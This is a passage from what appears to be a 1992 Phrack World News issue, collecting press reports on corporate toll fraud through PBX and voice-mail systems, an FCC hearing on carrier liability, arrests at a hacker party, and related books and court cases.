  6197. receiving our bills."  Investigation found that 800 number connecting Rolm
  6198. switch to company's voice mail was hackers' entry method, Mara said.
  6199.  
  6200. Clearly angry with AT&T, Mara said he has "a feeling they use it as a profit
  6201. center."  Lawrence Gessini, telecommunications director for Agway Corp. of
  6202. Syracuse, agreed, saying: "Toll fraud should not become a rationale for higher
  6203. profits for carriers."  He told FCC that new programs introduced by long
  6204. distance carriers won't solve problem because of constraints, limitations and
  6205. expense.
  6206.  
  6207. Speaking for International Communications Association (ICA) user group, Gessini
  6208. said problems occur because new technologies allow more types of fraud and
  6209. because "old tariff concepts" that limit common carrier liability "distort
  6210. market incentives."  Vendors, he said, are "generally lackadaisical and are
  6211. slow to correct even known problems in their hardware, firmware and software,"
  6212. and give low priority to complaints.  ICA advocated 5 principles including FCC
  6213. inquiry into fraud, creation of advisory committee and willingness of
  6214. Commission to protect users.
  6215.  
  6216. Geoffrey Williams, industry consultant and telecommunications manager for
  6217. IOMEGA Corp., said AT&T has been "most notable" for asking for restitution,
  6218. while Sprint and MCI are more lenient.  MCI doesn't charge users for first
  6219. hacking incident, he said, but after that users are on their own.
  6220.  
  6221. AT&T defended itself in afternoon session, when International Collections Dist.
  6222. Manager Peter Coulter rejected users' accusations, saying company had increased
  6223. customer education program "dramatically" since last year.  He insisted that
  6224. AT&T is "very concerned" by toll fraud: "Contrary to what some people want to
  6225. believe, no long distance carrier is making a profit off toll fraud."  He said
  6226. AT&T had 6,000 customers attend equipment security seminars in 1991, but that
  6227. number had been exceeded in first 6 months of 1992.  He said results of
  6228. increased education program were "only preliminary" but his group was receiving
  6229. "a lot more accommodations" than complaints from customers.
  6230.  
  6231. Coulter, while never admitting that company should shoulder any financial
  6232. liability, admitted that "things are different now" as to how AT&T approaches
  6233. toll fraud problem.  He said that within AT&T it used to be hardware division
  6234. vs. service division.  "The hardware guys said it was a service problem, the
  6235. service guys said it was the hardware's fault," Coulter said.  But now both
  6236. divisions are "working together on the problem . . . we're talking to each
  6237. other."
  6238.  
  6239. Delaney of N.Y. state police gave the FCC a picture of the toll fraud situation
  6240. dominated by as few as 15 practitioners, most of whom gain illegal entry to
  6241. telephone systems simply by dialing numbers for hours on end.  Those so-called
  6242. "finger hackers," rather than computer hackers, are responsible for 90% of
  6243. fraud, he said, telling Commission that equipment vendors should be held
  6244. accountable for fraud.  Most fraudulent calls go to Pakistan, Colombia and
  6245. Dominican Republic, he said.
  6246.  
  6247. Delaney pointed out practical objection to further vendor education problem,
  6248. telling commissioners that for vendor to engage in education would also be to
  6249. admit there could be problem with equipment security, something sales people
  6250. don't want to do.  He said some customers had been sold systems and didn't know
  6251. they had capability for remote access -- means used by hackers to gain entry.
  6252. _______________________________________________________________________________
  6253.  
  6254.  Hanging Up On Hackers                                         October 12, 1992
  6255.  ~~~~~~~~~~~~~~~~~~~~~
  6256.  by Miriam Leuchter (Crain's New York Business)(Page 21)
  6257.  
  6258.             "Thieves tap phone systems, but business cuts the line."
  6259.  
  6260. Ron Hanley suspected a technical glitch when his company's telephone bill
  6261. listed an unusually large number of calls lasting four seconds to its 800-
  6262. number from New York City.  But the executive at Dataproducts New England in
  6263. Wallingford, Connecticut didn't lose sleep over the problem -- until he got a
  6264. call two months later from the security department at American Telephone &
  6265. Telegraph Co.
  6266.  
  6267. Dataproducts had been hacked.  Two days after that, Mr. Hanley got a bill
  6268. confirming the bad news:  In one 24-hour period, street-corner phone users in
  6269. New York had made some 2,000 calls to the Caribbean on the company's line,
  6270. ringing up about $50,000 in tolls.
  6271.  
  6272. Dataproducts is not alone.  Estimates of the cost of telecommunications fraud
  6273. in the United States each year run from $1 billion to as much as $9 billion. 
  6274. According to John J. Haugh, editor of Toll Fraud and Telabuse and chairman of a
  6275. Portland, Oregon consulting firm, losses reached $4 billion in 1991 and are
  6276. expected to climb 30% in 1992.
  6277.  
  6278. Some 35,000 businesses and other users -- such as foundations and government
  6279. agencies -- will be hit this year.  In the first six months, Mr. Haugh says,
  6280. more than 900 New York City companies were victims of telephone-related fraud.
  6281.  
  6282. "If you have a PBX system or calling cards or voice mail, you are vulnerable,
  6283. exceedingly vulnerable," says Peggy Snyder, executive director of the
  6284. Communications Fraud Control Association, a national information clearinghouse
  6285. based in Washington.  "As technology gets more user-friendly, the opportunity
  6286. to commit a crime is much greater."
  6287.  
  6288. Armed with computers, modems and sometimes automatic dialers or random-number
  6289. generating software, high-technology thieves can use your telephone system as
  6290. if it is their own -- without having to pay the tolls.  The series of very
  6291. short calls Mr. Hanley spotted on one phone bill should have tipped off his
  6292. 800-number service provider -- which he had alerted when he spotted the pattern
  6293. -- that hackers were trying to break into his system.
  6294.  
  6295. Who are these hackers -- a term used to describe someone who uses a telephone
  6296. or computer to obtain unauthorized access to other computers?  Many are
  6297. teenagers or young adults out to demonstrate their computer skills and make
  6298. some mischief.  Five young New Yorkers are awaiting trial in federal court on
  6299. unauthorized access and interception of electronic communications charges in
  6300. one widely publicized telephone fraud case.
  6301.  
  6302. A much smaller proportion are more serious criminals: drug dealers, money
  6303. launderers and the like, who don't want their calls traced.  In one case, Ms.
  6304. Snyder cites a prostitution ring that employed unused voice mail extensions at
  6305. one company to leave and receive messages from clients.
  6306.  
  6307. Many hackers have connections to call-sell operators who set up shop at phone
  6308. booths, primarily in poorer immigrant neighborhoods in cities from New York to
  6309. Los Angeles.  For a flat fee -- the going rate is $10, according to one source
  6310. -- callers can phone anywhere in the world and talk as long as they want.  The
  6311. hawker at the phone booth pockets the cash and someone else pays the bill.
  6312.  
  6313. Perhaps 15 to 20 so-called finger hackers (who crack authorization codes by
  6314. hand dialing) distribute information to call-sell operators at thousands of
  6315. locations in New York.  According to Don Delaney, a senior investigator for the
  6316. New York State Police, the bulk of such calls from phone booths in the city go
  6317. to the Dominican Republic, Pakistan and Colombia.
  6318.  
  6319. Hackers may use more than technical skill to gain the access they want.
  6320. Sometimes they practice "social engineering" -- talking a company's employees
  6321. into divulging information about the telephone system.  Or they manage a
  6322. credible imitation of an employee, pretending to be an employee.
  6323.  
  6324. In one of the latest schemes, a fraudulent caller gets into a company's system
  6325. and asks the switchboard operator to connect him with an outside operator.  The
  6326. switchboard assumes the caller is an employee who wants to make a personal call
  6327. on his own calling card.
  6328.  
  6329. Instead, he uses a stolen or hacked calling card number.  The fraud goes
  6330. undetected until the card's owner reports the unauthorized use to his long-
  6331. distance carrier.  If the cardholder refuses to pay the charges, the phone
  6332. company traces the calls to the business from which they were placed.  Because
  6333. it looks as if the call came from the company, it is often held liable for the
  6334. charge.
  6335.  
  6336. In another new twist, a hacker gains access to an unused voice mail extension
  6337. at a company, or takes over someone's line at night or while the regular user
  6338. is on vacation.  He changes the recorded announcement to say, "Operator, this
  6339. number will accept all collect and third-party calls."  Then the hacker -- or
  6340. anyone else -- can telephone anywhere in the world and bill the charges to that
  6341. extension.
  6342.  
  6343. Sometimes the fraud is much more organized and sophisticated, however.  Robert
  6344. Rasor, special agent in charge of the financial crime division of the U.S.
  6345. Secret Service, gives an example of a three-way calling scheme in which hackers
  6346. tap into a phone system in the United States and set up a separate network that
  6347. allows people in other countries to call each other directly.  "The
  6348. Palestinians are one of the more prominent groups" running these sorts of
  6349. fraud, he says.
  6350.  
  6351. But no matter who the end user is, businesses like Dataproducts end up footing
  6352. the bill.  Personal users are generally not held liable for the unauthorized
  6353. use of their calling card numbers.  Under current regulation, a business is
  6354. responsible for all calls that go through its equipment, whether or not those
  6355. calls originated at the company.
  6356.  
  6357. This hard fact rankles Mr. Hanley.  "It's totally frustrating and almost
  6358. unbelievable that you're responsible for this bill.  It's really frightening
  6359. for any company."
  6360.  
  6361. Dataproducts's liability was relatively small compared with the $168,000
  6362. average Mr. Haugh calculated in a study he made last year.  It could have been
  6363. worse yet.
  6364.  
  6365. "The largest case I've ever seen in the metropolitan region was a company that
  6366. lost almost $1 million within 30 days," says Alan Brill, managing director of
  6367. the New York corporate security firm Kroll Associates Inc.
  6368.  
  6369. "It was a double whammy, because even though their long-distance carrier saw a
  6370. suspicious pattern of calls and blocked access to those area codes, the company
  6371. didn't know its PBX system would automatically switch to another carrier if
  6372. calls couldn't go through," Mr. Brill says.  "So the company got a bill for
  6373. $300,000 from its primary carrier and a $600,000 bill from the secondary
  6374. carrier."
  6375.  
  6376. Both AT&T and Sprint Corp. offer service plans that limit liability to $25,000
  6377. per fraud episode for their business customers.  Mr. Brill advises companies to
  6378. evaluate the cost-effectiveness of these plans in great detail, because in
  6379. order to be eligible for coverage companies must take certain steps to minimize
  6380. their risk.  "If you reduce your risk significantly, you may not need the
  6381. coverage," he says.
  6382.  
  6383. The plans require customers to respond to a problem in as little as two hours
  6384. after notification of unauthorized calls.  Doing so will stem your losses in
  6385. any event.  "You also have to think about how you're staffed," adds Mr. Brill. 
  6386. "Can you act that fast?"
  6387. _______________________________________________________________________________
  6388.  
  6389.  PWN Quicknotes
  6390.  ~~~~~~~~~~~~~~
  6391.  
  6392. 1.  HACKER PARTY BUSTED (by Robert Burg, Gannett, 11/3/92) -- "PumpCon Popped!"
  6393.     -- WHITE PLAINS, New York -- Police say a Halloween party they broke up
  6394.     Sunday (11/1/92) was more than just a rowdy party - it also was a computer
  6395.     hacker party.
  6396.  
  6397.     Three men were charged with unauthorized use of a computer and attempting
  6398.     computer trespass.  A fourth man was arrested on an outstanding warrant
  6399.     involving violating probation on a charge of computer fraud in Arizona,
  6400.     Greenburgh Detective Lt. Cornelius Sullivan said.
  6401.  
  6402.     Security officers at the Westchester Marriott contacted police after
  6403.     noticing an unusual number of people entering and leaving one room.  Police
  6404.     said that when they arrived, there were 21 people inside and computers
  6405.     hooked up to telephone lines.  Police said they also found telephone credit
  6406.     cards that did not belong to any of the people present.
  6407.  
  6408.     The three charged with unauthorized use of a computer and attempted
  6409.     computer trespass were Randy Sigman, 40, of Newington, Connecticut; Ronald
  6410.     G. Pinz, 21, of Wallingford, Connecticut and Byron Woodard, 18, of
  6411.     Woonsocket, Rhode Island.
  6412.  
  6413.     They were being held at the Westchester County Jail in Valhalla pending
  6414.     arraignment.
  6415.  
  6416.     The man charged on the warrant, Jason Brittain, 22, of Tucson, Arizona, was
  6417.     being held without bail pending arraignment.
  6418.  
  6419.     The Westchester County District Attorney frauds division seized the
  6420.     computer hardware, software, and other electrical equipment.
  6421.  
  6422.     Sullivan said the party-goers heard about the party through computer
  6423.     bulletin boards.
  6424.  
  6425. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6426.  
  6427. 2.  COMPUTER ACCESS ARRESTS IN NEW YORK (Barbara E. McMullen & John F.
  6428.     McMullen, Newsbytes, 11/3/92) -- GREENBURGH, NEW YORK -- The Greenburgh,
  6429.     New York Police Department has announced the arrest of three individuals,
  6430.     Randy P. Sigman, 40; Ronald G. Pinz, Jr, 21; and Byron J. Woodard, 18 for
  6431.     the alleged crimes of Unauthorized Use Of A Computer and Attempted Computer
  6432.     Trespass, both misdemeanors.  Also arrested was Jason A. Brittain, 22 in
  6433.     satisfaction of a State of Arizona Fugitive From Justice warrant.
  6434.  
  6435.     The arrests took place in the midst of an "OctoberCon" or "PumpCon" party
  6436.     billed as a "hacker get-together" at the Marriott Courtyard Hotel in
  6437.     Greenburgh.  The arrests were made at approximately 4:00 AM on Sunday
  6438.     morning, November 1st.  The three defendants arrested for computer crimes
  6439.     were granted $1,000 bail and will be arraigned on Friday, November 6th.
  6440.  
  6441.     Newsbytes sources said that the get together, which had attracted up to
  6442.     sixty people, had dwindled to approximately twenty-five when, at 10:00
  6443.     Saturday night, the police, in response to noise complaints arrived and
  6444.     allegedly found computers in use accessing systems over telephone lines.
  6445.     The police held the twenty-five for questioning and called in Westchester
  6446.     County Assistant District Attorney Kenneth Citarella, a prosecutor versed
  6447.     in computer crime, for assistance. During the questioning period, the
  6448.     information on Brittain as a fugitive from Arizona was obtained and at 4:00
  6449.     the three alleged criminal trespassers and Brittain were charged.
  6450.  
  6451.     Both Lt. DeCarlo of the Greenburgh police and Citarella told Newsbytes
  6452.     that the investigation is continuing and that no further information is
  6453.     available at this time.
  6454.  
  6455. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6456.  
  6457. 3.  U.S. PRISON SENTENCE FOR COMPUTER HACKER (New York Law Journal, 10/15/92,
  6458.     Page 7) -- A Brooklyn man was sentenced yesterday to eight months in prison
  6459.     for buying passwords from a computer hacker group known as the "masters of
  6460.     deception" [MOD] for resale to others seeking access to confidential credit
  6461.     reports.
  6462.  
  6463.     Morton Rosenfeld, 21, received the sentence in federal court in Manhattan
  6464.     after pleading guilty in June to obtaining the unauthorized access devices
  6465.     to computer data bases operated by TRW Information Services and other
  6466.     credit reporting companies.
  6467.  
  6468.     The sentence, imposed by Southern District Judge Shirley Wohl Kram, is
  6469.     believed to be among few prison terms levied for computer-related offenses.
  6470.  
  6471.     Meanwhile, charges are pending against Mr. Rosenfeld's alleged source: the
  6472.     five members of the masters of deception, young men in their teens and
  6473.     20's.  The five were accused in July of breaking into computer systems run
  6474.     by credit reporting services, telephone companies and educational
  6475.     institutions.
  6476.  
  6477.     For more information about the indictment and case against MOD, see ALL the
  6478.     articles in PWN 40-2.
  6479.  
  6480. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6481.  
  6482. 4.  2ND ONLINE LEGAL GUIDE RELEASED (by Barbara E. McMullen & John F. McMullen,
  6483.     Newsbytes, 10/13/92) -- NEW YORK CITY -- PC Information Group has announced
  6484.     the release of SysLaw, Second Edition: The Legal Guide for Online Service
  6485.     Providers by attorneys Lance Rose and Jonathan Wallace.
  6486.  
  6487.     According to the company, "Syslaw provides BBS sysops, network moderators
  6488.     and other online service providers with basic information on their rights
  6489.     and responsibilities, in a form that non-lawyers can easily understand."
  6490.  
  6491.     Subjects covered by the book include the First Amendment, copyrights and
  6492.     trademarks, the user agreement, negligence, privacy, criminal law, searches
  6493.     and seizures, viruses and adult materials.  The company claims that SysLaw
  6494.     not only explains the laws, but that it gives detailed advice enabling
  6495.     system operators to create the desired balance of user services, freedom,
  6496.     and protection from risk on their systems."
  6497.  
  6498.     Co-author Lance Rose told Newsbytes: "In the four years since the
  6499.     publication of the first edition, the electronic community has become
  6500.     alerted to the first amendment dimensions of the on-line community."
  6501.  
  6502.     "The first amendment has profound implications to the on-line community
  6503.     both to liberate providers and users of on-line systems and to protect them
  6504.     from undue legal harassment.  There has, in the last few years, been a lot
  6505.     of law enforcement activity effecting bulletin board systems, including the
  6506.     Steve Jackson and Craig Neidorf/Phrack cases," he said.
  6507.  
  6508.     Rose continued, "The new edition incorporates these new developments as
  6509.     well as containing new information concerning on-line property rights, user
  6510.     agreements, sysop liabilities, viruses and adult material contained on
  6511.     online systems."
  6512.  
  6513.     SysLaw is available from PC Information Group, 1126 East Broadway, Winona,
  6514.     MN  55987 (800-321-8285 or 507-452-2824) at a price of $34.95 plus $3.00
  6515.     shipping and (if applicable) sales tax.
  6516.  
  6517.     Press Contact:  Brian Blackledge, PC Information Group, 800-321-8285
  6518.  
  6519. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6520.  
  6521. 5.  YET ANOTHER BOOK ABOUT THE COMPUTER UNDERGROUND (The Daily Telegraph,
  6522.     12/14/92, Page 25) -- Approaching Zero: Data Crime and the Computer
  6523.     Underworld by Bryan Clough and Paul Mungo (Faber & Faber, L14.99) -- A look
  6524.     at the world of Fry Guy, Control C, Captain Zap and other hackers to blame
  6525.     for the viruses, logic bombs and Trojan horses in the world's personal
  6526.     computer networks.
  6527.  
  6528. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6529.  
  6530. 6.  HONOR STUDENT NABBED IN COMPUTER FRAUD (The Washington Times, 11/9/92, Page
  6531.     A6) -- BROOKSVILLE, FLA.-- Three high school honor students have been
  6532.     accused of stealing tens of thousands of dollars worth of long-distance
  6533.     calls as computer hackers.
  6534.  
  6535.     Brian McGrogan, 16, and Edmund Padgett, 17, who were charged as adults, and
  6536.     a 15-year-old allegedly tapped private telephone systems and dialed into an
  6537.     international hacking network.  One company's loss was $36,000.
  6538.  
  6539.     "These are very sharp, intelligent kids," Hernando County sheriff's Captain
  6540.     Richard Nugent said after the arrests.  "It's a game to them.  It's a
  6541.     sport."
  6542.  
  6543.     Some calls were made to computer bulletin boards in the United Kingdom,
  6544.     Germany and Canada, where a loose network of hackers allegedly shared
  6545.     information about how to obtain computer data and access information.
  6546.     Arrests in the case also were made in New York and Virginia, Captain Nugent
  6547.     said.
  6548.  
  6549.     The two older boys were booked on charges of organized fraud and violation
  6550.     of intellectual property.  The third boy was released to his parents.
  6551.  
  6552. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6553.  
  6554. 7.  A CORDLESS PHONE THAT CAN THWART EAVESDROPPERS (Business Week, 8/3/92) --
  6555.     To industrial spies and other snoops, the millions of cordless phones in
  6556.     use are goldmines of information.  Conversations can be plucked out of the
  6557.     air by means of a police type scanner, and with increasing ease.  The
  6558.     latest no-cord technologies offers clearer sound and longer ranges -- up to
  6559.     half a mile.  That's because the new phones broadcast signals at 900 MHz,
  6560.     or 20 times the frequency of current models.
  6561.  
  6562.     Cincinnati Microwave, Inc. (the radar detector people) figures executives
  6563.     and consumers will pay a small premium for cordless privacy.  The company
  6564.     has developed a phone, to be marketed in October by its Escort division for
  6565.     about $300, that thwarts eavesdroppers with "spread spectrum" technology,
  6566.     which is similar to the encryption method that the military uses in secure
  6567.     radios.  The signals between the handset and base unit are digitized,
  6568.     making them unintelligible to humans, and the transmission randomly hops
  6569.     among various frequencies within the 900 MHz spectrum.  To keep the cost
  6570.     down to the range of other 900 MHz models, Cincinnati Microwave has
  6571.     developed special microchips that keep the handset and base in sync.
  6572.  
  6573. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6574.  
  6575. 8.  NEW AREA CODE -- As of November 1, 1992, a new 210 area code is serving 152
  6576.     communities in the San Antonio and Rio Grande Valley areas.
  6577.  
  6578. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6579.  
  6580. 9.  FOR SALE: PHONE-PHREAKING TOOLS (Brigid McMenamin, Forbes, 8/3/92, Page 64)
  6581.     -- From his remote outpost in Alamogordo, New Mexico, John Williams makes a
  6582.     nice living telling hackers how to rip off phone and computer systems.
  6583.  
  6584.     Williams says he brings in about $200,000 a year publishing books on
  6585.     everything from credit card scams and cracking automated teller machines to
  6586.     electronic shoplifting, cellular phone phreaking and voice mailbox hacking,
  6587.     each costing $29 to $39, and each complete with precise instructions.  He
  6588.     even sells Robofones, which save hackers from doing a lot of dialing while
  6589.     they steal access codes.
  6590.  
  6591.     Isn't what he does illegal?  Perhaps it should be, but it isn't.  Wrapping
  6592.     himself in the First Amendment, Williams is a member in good standing of
  6593.     the Alamogordo Chamber of Commerce and the New Mexico Better Business
  6594.     Bureau.  He thumbs his nose at companies and authorities that would like to
  6595.     make him stop selling such secrets.  "We don't promote fraud," he insists.
  6596.     "It's all sold for educational purposes only.  If we didn't publish the
  6597.     information, it would still be out there."
  6598.  
  6599.     But last year Williams got a visit form the Secret Service, which was
  6600.     following up on a telephone fraud case in which one of his publications
  6601.     figured prominently.
  6602.  
  6603.     In Gainsville, Florida, in November 1990, two young men were locked up by
  6604.     police for hacking into voice-mail systems and then making calls to 900
  6605.     numbers.  One of the pair, known as the Shark, then 20, confessed to the
  6606.     crime, but said he was on assignment for Williams' Consumertronics
  6607.     publication.  The culprits could have been given five years on the fraud
  6608.     charge alone.  But the victim didn't want any publicity, so the state let
  6609.     them do 50 hours of community service instead.
  6610.  
  6611.     The Secret Service went to talk to Williams.  Williams assured agent James
  6612.     Pollard that he'd never told the Shark to do anything illegal.
  6613.     Nevertheless, says Williams, the agent implied that Williams and members of
  6614.     his family who work for him might be prosecuted for publishing voice-mail
  6615.     access codes.
  6616.  
  6617.     In the end, no charges were filed against Williams, who admits he has a
  6618.     thing against big business, especially the phone companies.  "For decades,
  6619.     they financed right-wing regimes in Latin America," he rants.
  6620.  
  6621.     It's a crazy world, that of the telephone toll fraudsters.
  6622.  
  6623. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6624.  
  6625. 10. NEW YORK STATE POLICE DECRIMINALIZE THE WORD "HACKER" (Barbara E. McMullen
  6626.     & John F. McMullen, Newsbytes, 10/21/92) -- ALBANY, NEW YORK -- Senior
  6627.     investigator Ron Stevens of the New York State Police Computer Unit has
  6628.     told Newsbytes that it will be the practice of his unit to avoid the use of
  6629.     the term "hacker" in describing those alleged to have committed computer
  6630.     crimes.
  6631.  
  6632.     Stevens told Newsbytes, "We use the term computer criminal to describe
  6633.     those who break the law using computers.  While the lay person may have
  6634.     come to understand the meaning of hacker as a computer criminal, the term
  6635.     isn't accurate.  The people in the early days of the computer industry
  6636.     considered themselves hackers and they made the computer what it is today.
  6637.     There are those today who consider themselves hackers and do not commit
  6638.     illegal acts."
  6639.  
  6640.     Stevens had made similar comments in a recent conversation with Albany BBS
  6641.     operator Marty Winter.  Winter told Newsbytes, "'Hacker' is, unfortunately
  6642.     an example of the media taking what used to be an honorable term, and using
  6643.     it to describe an activity because they (the media) are too lazy or stupid
  6644.     to come up with something else.  Who knows, maybe one day 'computer
  6645.     delinquent' WILL be used, but I sure ain't gonna hold my breath."
  6646.  
  6647.     Stevens, together with investigator Dick Lynch and senior investigator
  6648.     Donald Delaney, attended the March 1992 Computers, Freedom and Privacy
  6649.     Conference (CFP-2) in Washington, DC and met such industry figures as Glenn
  6650.     Tenney, congressional candidate and chairman of the WELL's annual "Hacker
  6651.     Conference"; Craig Neidorf, founding editor and publisher of Phrack; Steven
  6652.     Levy, author of "Hackers" and the recently published "Artificial Life";
  6653.     Bruce Sterling, author of the recently published "The Hacker Crackdown";
  6654.     Emmanuel Goldstein, editor and publisher of 2600: The Hacker Quarterly" and
  6655.     a number of well-known "hackers."
  6656.  
  6657.     Stevens said, "When I came home, I read as much of the literature about the
  6658.     subject that I could and came to the conclusion that a hacker is not
  6659.     necessarily a computer criminal."
  6660.  
  6661.     The use of the term "hacker" to describe those alleged to have committed
  6662.     computer crimes has long been an irritant to many in the online community.
  6663.     When the July 8th federal indictment of 5 New York City individuals
  6664.     contained the definition of computer hacker as "someone who uses a computer
  6665.     or a telephone to obtain unauthorized access to other computers," there was
  6666.     an outcry on such electronic conferencing system as the WELL (Whole Earth
  6667.     'Lectronic Link).  Many of the same people reacted quite favorably to the
  6668.     Stevens statement when it was posted on the WELL.
  6669.  
  6670. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  6671. 11.  STEVE JACKSON GAMES TRIAL DATE SET -- Mike Godwin, General Counsel for the
  6672.      Electronic Frontier Foundation, announced on December 23rd that the case
  6673.      of Steve Jackson Games, et.al. v. The United States Secret Service et. al.
  6674.      will go to trial in Austin, Texas on Tuesday, January 19, 1993.
  6675. _______________________________________________________________________________
  6676.  
  6677.  
  6678.                       --- This File Passed Through: ---
  6679.  
  6680.         -->  WORLD CH/\OS / MiNiSTRY HQ / 302-453-0559 / 2 Nodez!  <--
  6681.  
  6682.